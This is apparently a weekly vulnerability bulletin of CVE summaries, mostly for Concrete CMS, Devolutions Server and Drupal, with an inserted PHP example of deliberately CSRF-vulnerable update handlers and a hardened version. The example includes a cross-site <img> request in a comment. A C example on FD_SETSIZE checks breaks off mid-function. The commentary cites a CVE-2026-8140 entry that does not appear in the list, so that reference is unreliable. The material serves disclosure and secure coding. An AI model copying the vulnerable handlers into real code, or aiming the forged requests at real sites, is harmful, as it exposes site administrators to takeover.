Concrete CMS–Concrete CMS Concrete CMS 9.5.0 and below is vulnerable to IDOR combined with an incorrect authorization level in the Express association Reorder dialog. This allows cross-entity state tampering by a user holding only view permission on one entry. To be affected, a website has to be using Express and relying on Express entity ordering. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Winston Crooker for reporting. 2026-05-22 not yet calculated CVE-2026-8347 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9.5.0 and below is vulnerable to missing authorization in the bulk_user_assignment.php which can lead to privilege escalation to Administrative Group. Any authenticated user with access to the bulk user assignment dashboard page can add any user email to any group and can remove legitimate admins. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 7.5 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks Vincent55 for reporting. 2026-05-21 not yet calculated CVE-2026-8350 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS version 9.0 to 9.5.0 is vulnerable to Stored XSS via page name in the Atomik theme. A rogue editor can inject arbitrary JavaScript that executes in the context of any authenticated user visiting the affected account pages. This can lead to session hijacking, credential theft, malicious actions performed on behalf of users, and potential privilege escalation. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.1 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. 2026-05-22 not yet calculated CVE-2026-8353 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/dialog/logs/delete. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. 2026-05-21 not yet calculated CVE-2026-8409 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/dialog/logs/bulk/delete. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. 2026-05-21 not yet calculated CVE-2026-8410 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/dialog/page/bulk/delete. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. 2026-05-21 not yet calculated CVE-2026-8411 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/dialog/page/bulk/cache. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. 2026-05-21 not yet calculated CVE-2026-8412 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/dialog/page/bulk/design. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. 2026-05-21 not yet calculated CVE-2026-8413 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/dialog/event/duplicate. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. 2026-05-21 not yet calculated CVE-2026-8414 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/dialog/express/association/reorder. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. 2026-05-21 not yet calculated CVE-2026-8415 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/backend/file addFavoriteFolder($id). The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. 2026-05-21 not yet calculated CVE-2026-8416 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9.5.0 and below does not validate a CSRF token before processing requests to /dashboard/extend/update/do_update/<pkgHandle>. The do_update() method in concrete/controllers/single_page/dashboard/extend/update.php checks only canInstallPackages() before executing upgradeCoreData() and upgrade() on the named package’s controller. Because the endpoint is a state-changing GET route with no token enforcement, an attacker can force an authenticated administrator to trigger a package upgrade via a single cross-site navigation. In order to be vulnerable, the victim must be passing canInstallPackages() and a target package must already be installed. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 7.5 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks https://github.com/maru1009 for reporting. 2026-05-21 not yet calculated CVE-2026-8417 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9.5.0 and below contains a CSRF vulnerability in the install_package() method of concrete/controllers/single_page/dashboard/extend/install.php. An attacker who can cause an authenticated administrator to visit a crafted page, and who has placed or caused a package to be present under DIR_PACKAGES/<handle>/, can force the installation of that package without any CSRF protection. Package installation executes the package controller’s install() method as the web server user, enabling remote code execution. In order to be vulnerable, the victim must be passing canInstallPackages(). The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 7.5 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks https://github.com/maru1009 for reporting. 2026-05-21 not yet calculated CVE-2026-8421 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9.5.0 and below does not validate a CSRF token before processing requests to /dashboard/extend/update/prepare_remote_upgrade/<remoteMPID>. An attacker who controls the remote package returned for a known marketplace item ID can overwrite the package PHP on disk and force its upgrade() method to execute in a single browser navigation. This results in remote code execution as the web server user. In order to be vulnerable, the victim must be passing canInstallPackages(), the victim site must be connected to the Concrete marketplace, and the attacker must control the package returned for a marketplace item ID already installed on the victim site. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 7.5 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks https://github.com/maru1009 for reporting. 2026-05-21 not yet calculated CVE-2026-8426 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/backend/file removeFavoriteFolder($id). The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. 2026-05-21 not yet calculated CVE-2026-8427 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9.5.0 and below emits a CSRF token in the local_available_update.php view ($token->output('do_update')) but the corresponding do_update() method in concrete/controllers/single_page/dashboard/system/update/update.php never calls $this->token->validate('do_update'). The form is rendered as a POST form, meaning the token reaches the browser, but because the controller discards it without verification, an attacker can craft a cross-site POST that triggers a core CMS update to an attacker-specified version string. In order to be vulnerable, the victim must be passing canUpgrade() and a valid update version must be present under DIR_CORE_UPDATES. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 7.5 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks https://github.com/maru1009 for reporting. 2026-05-21 not yet calculated CVE-2026-8428 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
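The five package-install and update entries above (CVE-2026-8140, -8417, -8421, -8426 and -8428) show two distinct CSRF failure modes on privileged routes: a state-changing GET with no token at all, and a POST form whose token is rendered but never validated by the controller. The following is an added example, not Concrete CMS code. CsrfToken is a minimal per-action token helper written for this illustration, the three handlers are stand-ins for the real controllers, the session is a plain array so the file runs from the CLI, and the field name ccm_token is assumed. It shows both vulnerable shapes beside a handler that insists on POST and validates the token for the specific action.

```php
<?php
// Added example (not Concrete CMS code). CsrfToken, the handlers and the
// field name ccm_token are illustrative; the session is simulated.

declare(strict_types=1);

final class CsrfToken
{
    private const TTL = 3600;
    private array $session;

    public function __construct(array &$session)
    {
        $this->session = &$session;
    }

    // Per-action token: HMAC over the action name and issue time, keyed with
    // a random secret that lives only in the server-side session.
    public function generate(string $action): string
    {
        $this->session['csrf_secret'] ??= bin2hex(random_bytes(32));
        $issued = time();
        $mac = hash_hmac('sha256', "{$action}:{$issued}", $this->session['csrf_secret']);
        return "{$issued}:{$mac}";
    }

    public function validate(string $action, ?string $token): bool
    {
        if ($token === null || !isset($this->session['csrf_secret'])) {
            return false;
        }
        [$issued, $mac] = array_pad(explode(':', $token, 2), 2, '');
        if (!preg_match('/^\d+$/', $issued) || time() - (int) $issued > self::TTL) {
            return false;
        }
        $expected = hash_hmac('sha256', "{$action}:{$issued}", $this->session['csrf_secret']);
        return hash_equals($expected, $mac);   // constant-time compare
    }
}

// Stand-in for the privileged action (package download, package upgrade,
// core update).
function performUpdate(string $version): string
{
    return "updated to {$version}";
}

// (a) Vulnerable: permission check only, reachable by GET. A cross-site
// <img src="https://victim/.../do_update/9.9.9"> on any page is enough.
function doUpdateGetNoToken(bool $canUpgrade, array $query): string
{
    if (!$canUpgrade) { return '403'; }
    return performUpdate($query['version']);
}

// (b) Vulnerable: the form carries a token, but the handler never reads it.
function doUpdatePostTokenIgnored(bool $canUpgrade, array $post): string
{
    if (!$canUpgrade) { return '403'; }
    return performUpdate($post['version']);
}

// (c) Hardened: POST only, and the token must validate for this action.
function doUpdateHardened(bool $canUpgrade, string $method, array $post, CsrfToken $t): string
{
    if (!$canUpgrade) { return '403'; }
    if ($method !== 'POST' || !$t->validate('do_update', $post['ccm_token'] ?? null)) {
        return '403 invalid or missing CSRF token';
    }
    return performUpdate($post['version']);
}

// Constructed run: the victim is an administrator (permission check passes);
// the attacker's page supplies the request body, which has no valid token.
$session = [];
$token = new CsrfToken($session);
$forged = ['version' => '9.9.9-evil'];

echo "(a) ", doUpdateGetNoToken(true, $forged), PHP_EOL;
echo "(b) ", doUpdatePostTokenIgnored(true, $forged), PHP_EOL;
echo "(c) ", doUpdateHardened(true, 'POST', $forged, $token), PHP_EOL;

// The legitimate form submits the token it was rendered with.
$legit = ['version' => '9.5.1', 'ccm_token' => $token->generate('do_update')];
echo "(c) ", doUpdateHardened(true, 'POST', $legit, $token), PHP_EOL;
```

Two points the entries make and the code reflects: a permission check is not a CSRF defence, because the forged request rides on the victim's own session and passes it; and rendering a token in the view proves nothing unless the controller for that action calls validate() before doing the work.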
 
Concrete CMS–Concrete CMS Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/backend/file star(). The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. 2026-05-21 not yet calculated CVE-2026-8432 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/backend/file rescan(). The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. 2026-05-21 not yet calculated CVE-2026-8433 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/backend/file rescanMultiple(). The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. 2026-05-21 not yet calculated CVE-2026-8434 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Concrete CMS–Concrete CMS Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/backend/file approveVersion(). The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. 2026-05-21 not yet calculated CVE-2026-8435 https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
 
Creartia Internet Consulting–ICMS Content Management Authorization Bypass vulnerability in Creartia’s ICMS software could allow an attacker to gain unauthorized access to protected features by manipulating the HTTP redirect headers of the login process, causing the script to continue running and enabling privilege escalation without the need for credentials. 2026-05-18 not yet calculated CVE-2026-4320 https://www.incibe.es/en/incibe-cert/notices/aviso/authorization-bypass-icms-content-management-creartia-internet-consulting
 
cyntler–react-doc-viewer v1.17.1 Cross-Site Scripting (XSS) vulnerability in @cyntler/react-doc-viewer v1.17.1 allows remote attackers to execute arbitrary JavaScript via a crafted .txt file. The TXTRenderer component fails to sanitize file content and explicitly casts raw data as a ReactNode. 2026-05-20 not yet calculated CVE-2026-30691 https://github.com/cyntler/react-doc-viewer/issues/317
https://github.com/walidriouah/CVE-2026-30691
 
Dell–Portrait Dell Color Management Application An issue was discovered in the Portrait Dell Color Management application before 3.7.0 for Dell monitors. On Windows, a symbolic link vulnerability allows a local low-privileged user to escalate privileges to Administrator. During installation, the software writes the file CCFLFamily_07Feb11.edr to C:\ProgramData\Portrait Displays\CWdata\i1D3 while running with elevated privileges. Because the installer does not properly validate symbolic links or reparse points at the destination path, an attacker can create a malicious link that redirects the write operation to an arbitrary system location, enabling arbitrary file creation or overwrite with elevated privileges. 2026-05-19 not yet calculated CVE-2026-34883 https://www.portrait.com/dell-security-cve-updates/
https://www.portrait.com/dell
 
Devolutions–Server Improper access control in the entry activity log feature in Devolutions Server allows an authenticated user with access to an entry but without the required permission to retrieve that entry’s activity logs via a crafted API request. This issue affects Devolutions Server 2026.1.6.0 through 2026.1.16.0 and Devolutions Server 2025.3.20.0 and earlier. 2026-05-22 not yet calculated CVE-2026-5171 https://devolutions.net/security/advisories/DEVO-2026-0013/
 
Devolutions–Server Improper authorization in the Active Directory browsing feature in Devolutions Server allows a low-privileged authenticated user to obtain authentication material associated with a stored PAM provider service account via authentication relay to an attacker-controlled server. This issue affects Devolutions Server 2026.1.6.0 through 2026.1.16.0 and Devolutions Server 2025.3.20.0 and earlier. 2026-05-22 not yet calculated CVE-2026-7325 https://devolutions.net/security/advisories/DEVO-2026-0013/
 
Devolutions–Server Improper enforcement of the sealed-entry workflow in the entry sensitive-data retrieval feature in Devolutions Server allows an authenticated user with access to a sealed entry to retrieve its sensitive data without triggering the unseal audit notification via a crafted API request. This issue affects Devolutions Server 2026.1.6.0 through 2026.1.16.0 and Devolutions Server 2025.3.20.0 and earlier. 2026-05-22 not yet calculated CVE-2026-8477 https://devolutions.net/security/advisories/DEVO-2026-0013/
 
Devolutions–Server Improper handling of factor key state in the multi-factor authentication management feature in Devolutions Server allows an attacker with knowledge of a user’s password to bypass the user’s multi-factor authentication after the user reconfigures their factors. This issue affects Devolutions Server 2026.1.6.0 through 2026.1.16.0. 2026-05-22 not yet calculated CVE-2026-9047 https://devolutions.net/security/advisories/DEVO-2026-0013/
 
Devolutions–Server Missing authorization in the vault import feature in Devolutions Server 2026.1.16.0 and earlier allows a low-privileged authenticated user to create new vaults via a crafted import request. 2026-05-22 not yet calculated CVE-2026-9223 https://devolutions.net/security/advisories/DEVO-2026-0013/
 
Devolutions–Server Missing authorization in the user profile update feature in Devolutions Server allows an authenticated Active Directory user to modify their own profile attributes via a crafted API request. This issue affects Devolutions Server 2026.1.6.0 through 2026.1.16.0 and Devolutions Server 2025.3.20.0 and earlier. 2026-05-22 not yet calculated CVE-2026-9224 https://devolutions.net/security/advisories/DEVO-2026-0013/
 
Devolutions–Server Improper input validation in the external authentication provider flow in Devolutions Server allows an unauthenticated remote attacker to redirect victims to an attacker-controlled domain via a crafted login link. This issue affects Devolutions Server 2026.1.6.0 through 2026.1.16.0 and Devolutions Server 2025.3.20.0 and earlier. 2026-05-22 not yet calculated CVE-2026-9245 https://devolutions.net/security/advisories/DEVO-2026-0013/
 
Devolutions–Server Improper access control in the entry documentation and attachment features in Devolutions Server allows an authenticated user with vault read access to retrieve the documentation and attachments of sealed entries via a crafted API request. This issue affects Devolutions Server 2026.1.6.0 through 2026.1.16.0 and Devolutions Server 2025.3.20.0 and earlier. 2026-05-22 not yet calculated CVE-2026-9246 https://devolutions.net/security/advisories/DEVO-2026-0013/
 
Devolutions–Server Insufficient logging in the entry export feature in Devolutions Server allows an authenticated user with export permissions to export a sealed entry without triggering the unseal notification to administrators via a crafted export request. This issue affects Devolutions Server 2026.1.6.0 through 2026.1.16.0 and Devolutions Server 2025.3.20.0 and earlier. 2026-05-22 not yet calculated CVE-2026-9247 https://devolutions.net/security/advisories/DEVO-2026-0013/
 
Devolutions–Server Authorization bypass in the entry duplication feature in Devolutions Server allows an authenticated user with write access to any vault to copy documentation and attachments from an entry in a vault they cannot access via a crafted save request. This issue affects Devolutions Server 2026.1.6.0 through 2026.1.16.0 and Devolutions Server 2025.3.20.0 and earlier. 2026-05-22 not yet calculated CVE-2026-9248 https://devolutions.net/security/advisories/DEVO-2026-0013/
 
Devolutions–Server Unverified password change in Devolutions Server allows an attacker to change a user’s password without providing the previous one via a crafted password change request. This issue affects Devolutions Server 2026.1.6.0 through 2026.1.16.0 and Devolutions Server 2025.3.20.0 and earlier. 2026-05-22 not yet calculated CVE-2026-9249 https://devolutions.net/security/advisories/DEVO-2026-0013/
 
Devolutions–Server Missing authorization in the entry status management feature in Devolutions Server allows a non-administrator authenticated user to bypass the administrator-enforced Pending Approval flow and gain access to an entry’s data via a crafted status change request. This issue affects Devolutions Server 2026.1.6.0 through 2026.1.16.0 and Devolutions Server 2025.3.20.0 and earlier. 2026-05-22 not yet calculated CVE-2026-9251 https://devolutions.net/security/advisories/DEVO-2026-0013/
 
discourse–discourse Discourse is an open-source discussion platform. In versions prior to 2026.1.4, 2026.3.1, 2026.4.1 and 2026.5.0-latest.1, an authenticated user on a Discourse instance with the form templates feature enabled can read the name and structured content of form templates that are intended exclusively for categories they are not authorized to access. Impact is limited to disclosure of site configuration metadata. This issue has been fixed in versions 2026.1.4, 2026.3.1, 2026.4.1 and 2026.5.0-latest.1. 2026-05-19 not yet calculated CVE-2026-33514 https://github.com/discourse/discourse/security/advisories/GHSA-w6g7-p2p9-2m5h
https://github.com/discourse/discourse/commit/ae5c9570fb918442c4d96abc83c1e7e169909b02
 
discourse–discourse Discourse is an open-source discussion platform. In versions prior to 2026.1.4, 2026.3.1, 2026.4.1 and 2026.5.0-latest.1, a vulnerability in the discourse-subscriptions plugin allows users to gain access to subscription-gated groups without completing payment. This issue has been fixed in versions 2026.1.4, 2026.3.1, 2026.4.1 and 2026.5.0-latest.1. 2026-05-19 not yet calculated CVE-2026-34154 https://github.com/discourse/discourse/security/advisories/GHSA-pjgj-7mjq-6j7g
 
Drupal–Colorbox Inline Improper Neutralization of Input During Web Page Generation (“Cross-site Scripting”) vulnerability in Drupal Colorbox Inline allows Cross-Site Scripting (XSS). This issue affects Colorbox Inline: from 0.0.0 before 2.1.1. 2026-05-19 not yet calculated CVE-2026-8493 https://www.drupal.org/sa-contrib-2026-036
 
Drupal–Date iCal Missing Authorization vulnerability in Drupal Date iCal allows Forceful Browsing. This issue affects Date iCal: from 0.0.0 before 4.0.15. 2026-05-19 not yet calculated CVE-2026-8495 https://www.drupal.org/sa-contrib-2026-037
 
Drupal–Drupal core Improper Neutralization of Input During Web Page Generation (“Cross-site Scripting”) vulnerability in Drupal Drupal core allows Cross-Site Scripting (XSS). This issue affects Drupal core: from 8.0.0 before 10.5.9, from 10.6.0 before 10.6.7, from 11.0.0 before 11.2.11, from 11.3.0 before 11.3.7. 2026-05-19 not yet calculated CVE-2026-6365 https://www.drupal.org/sa-core-2026-001
 
Drupal–Drupal core Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability in Drupal Drupal core allows Object Injection. This issue affects Drupal core: from 8.0.0 before 10.5.9, from 10.6.0 before 10.6.7, from 11.0.0 before 11.2.11, from 11.3.0 before 11.3.7. 2026-05-19 not yet calculated CVE-2026-6366 https://www.drupal.org/sa-core-2026-002
 
Drupal–Drupal core Improper Neutralization of Input During Web Page Generation (“Cross-site Scripting”) vulnerability in Drupal Drupal core allows Cross-Site Scripting (XSS). This issue affects Drupal core: from 11.3.0 before 11.3.7. 2026-05-19 not yet calculated CVE-2026-6367 https://www.drupal.org/sa-core-2026-003
 
Drupal–Node View Permissions Improper Check for Unusual or Exceptional Conditions vulnerability in Drupal Node View Permissions allows Forceful Browsing. This issue affects Node View Permissions: from 0.0.0 before 1.7.0, from 2.0.0 before 2.0.1. 2026-05-19 not yet calculated CVE-2026-8491 https://www.drupal.org/sa-contrib-2026-034
 
Drupal–Obfuscate Improper Neutralization of Input During Web Page Generation (“Cross-site Scripting”) vulnerability in Drupal Obfuscate allows Cross-Site Scripting (XSS). This issue affects Obfuscate: from 0.0.0 before 2.0.2. 2026-05-19 not yet calculated CVE-2026-6871 https://www.drupal.org/sa-contrib-2026-033
 
Drupal–Orejime Improper Neutralization of Input During Web Page Generation (“Cross-site Scripting”) vulnerability in Drupal Orejime allows Cross-Site Scripting (XSS). This issue affects Orejime: from 0.0.0 before 2.0.16. 2026-05-19 not yet calculated CVE-2026-6095 https://www.drupal.org/sa-contrib-2026-032
 
Drupal–Simple Hierarchical Select (shs) Simple Hierarchical Select (SHS) for Drupal 7 contains a cross-site scripting vulnerability due to improper output escaping of term-derived text. Confirmed affected paths include field formatter output (shs_field_formatter_view) and term-tree child-term data generation (shs_term_get_children). Malicious taxonomy term names can be rendered unsafely depending on the output context. This affects versions from 7.x-1.0 through (and including) 7.x-1.10. 2026-05-21 not yet calculated CVE-2026-4929 NES patch branch comparison
https://d7es.tag1.com/security-advisories/simple-hierarchical-select-moderately-critical-cross-site-scripting
 
Drupal–Term Reference Tree In the Drupal 7 Term Reference Tree module, two stored XSS vectors exist in the widget/formatter rendering pipeline. Vector A (token display templates): When the Token module is enabled and token display templates are configured, attacker-controlled token output (e.g., term description) is rendered without proper sanitization. Any user who can edit the referenced taxonomy terms can inject HTML/JS that executes when the field is rendered. Vector B (term label rendering): Taxonomy term labels are not properly sanitized before being rendered in the widget, allowing a user with permission to create or edit taxonomy terms to inject scripts into the term name that execute when a form containing the widget is viewed. Affected versions: 7.x-1.x up to and including 7.x-1.11. 2026-05-21 not yet calculated CVE-2026-4093 https://www.herodevs.com/vulnerability-directory/cve-2026-4093
https://d7es.tag1.com/security-advisories/taxonomy-term-reference-tree-widget-moderately-critical-cross-site-scripting
 
Drupal–Translate Drupal with GTranslate Modification of Assumed-Immutable Data (MAID) vulnerability in Drupal Translate Drupal with GTranslate allows Resource Location Spoofing. This issue affects Translate Drupal with GTranslate: from 0.0.0 before 3.0.5. 2026-05-19 not yet calculated CVE-2026-8492 https://www.drupal.org/sa-contrib-2026-035
 
Easy Chat–Easy Chat Server 3.1 Directory Traversal vulnerability in Easy Chat Server 3.1 allows a remote attacker to obtain sensitive information and execute arbitrary code via the UserName parameter. 2026-05-22 not yet calculated CVE-2026-36227 http://easy.com
https://github.com/NullByte8080/CVE-2026-36227
 
Easy Chat–Easy Chat Server 3.1 Buffer Overflow vulnerability in Easy Chat Server 3.1 allows a remote attacker to obtain sensitive information and execute arbitrary code via the chat message functionality. 2026-05-22 not yet calculated CVE-2026-36228 http://easy.com
https://github.com/NullByte8080/CVE-2026-36228
 
Epson–Epson L14150 FL27PB Buffer overflow vulnerability in EPSON L14150 FL27PB allows a remote attacker to execute arbitrary code via the RAW Printing Service (JetDirect) on TCP port 9100. 2026-05-20 not yet calculated CVE-2026-39047 https://github.com/AzhariRamadhan/CVE-PORT-9100
https://gist.github.com/AzhariRamadhan/1defc815542fb72e6025da2ce53a1046
 
Follett–Software’s Destiny Library Manager Directory traversal in Follett Software’s Destiny Library Manager 22_0_2_rc1 (fixed in v22.5 AU1) allows remote attackers to read arbitrary system and application files via the image parameter. 2026-05-22 not yet calculated CVE-2025-45145 http://follett.com
https://medium.com/@jaredutahusa/cve-2025-45145-unauthenticated-local-file-inclusion-in-fsc-destiny-40a3f11b3a4d
 
frappe–frappe Frappe is a full-stack web application framework. Versions prior to 15.105.0 and 16.15.0 contain a possible Arbitrary File Read vulnerability via Path Traversal. The issue is resolved in versions 16.15.0, 15.105.0 and above. 2026-05-20 not yet calculated CVE-2026-39352 https://github.com/frappe/frappe/security/advisories/GHSA-67rf-pxgh-vfqv
https://github.com/frappe/frappe/releases/tag/v16.15.0
 
frappe–lms Frappe Learning Management System (LMS) is a learning system that helps users structure their content. In versions 2.50.0 and below, a user with course editing role could upload a SCORM ZIP package to write files outside the intended directory. This issue has been resolved in version 2.50.1. 2026-05-20 not yet calculated CVE-2026-39405 https://github.com/frappe/lms/security/advisories/GHSA-mxh7-g3r7-g96h
https://github.com/frappe/lms/releases/tag/v2.50.1
 
FreeBSD–FreeBSD libcasper(3) communicates with helper processes via UNIX domain sockets, and uses the select(2) system call to wait for data to become available. However, it does not verify that its socket descriptor fits within select(2)’s descriptor set size limit of FD_SETSIZE (1024). An attacker able to cause an application using libcasper(3) to allocate large file descriptors, e.g., by opening many descriptors and executing a program which is not careful to close them upon startup, may trigger stack corruption. If the target application runs with setuid root privileges, this could be used to escalate local privileges. 2026-05-21 not yet calculated CVE-2026-39461 https://security.freebsd.org/advisories/FreeBSD-SA-26:22.libcasper.asc
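An added example, not code from the FreeBSD advisory or from libcasper itself, showing the check the entry above says was missing: a readiness wait that validates the descriptor against FD_SETSIZE before FD_SET() can write past a stack-allocated fd_set, beside the poll(2) form that has no descriptor-value limit. The function names and the pipe-based self-check are this example's own.

```c
#include <errno.h>
#include <poll.h>
#include <stddef.h>
#include <sys/select.h>
#include <sys/time.h>
#include <unistd.h>

/*
 * Returns 0 if fd may be placed in an fd_set, -1 (errno = EINVAL) otherwise.
 * FD_SET() performs no bounds check: with fd >= FD_SETSIZE it writes past the
 * end of the fd_set, which is stack corruption when the set is a local.
 */
int
fdset_check(int fd)
{
	if (fd < 0 || fd >= FD_SETSIZE) {
		errno = EINVAL;
		return (-1);
	}
	return (0);
}

/*
 * Wait up to timeout_ms for fd to become readable via select(2).
 * Returns 1 if readable, 0 on timeout, -1 on error. The descriptor is
 * validated before it ever touches the fd_set.
 */
int
wait_readable_select(int fd, int timeout_ms)
{
	fd_set rfds;
	struct timeval tv;
	int n;

	if (fdset_check(fd) == -1)
		return (-1);
	FD_ZERO(&rfds);
	FD_SET(fd, &rfds);
	tv.tv_sec = timeout_ms / 1000;
	tv.tv_usec = (timeout_ms % 1000) * 1000;
	do {
		n = select(fd + 1, &rfds, NULL, NULL, &tv);
	} while (n == -1 && errno == EINTR);
	return (n);
}

/*
 * The same wait via poll(2). poll has no descriptor-value limit, so a
 * helper that must cope with arbitrary descriptor numbers (as a library
 * used by setuid programs must) should prefer it, or kqueue, over select.
 */
int
wait_readable_poll(int fd, int timeout_ms)
{
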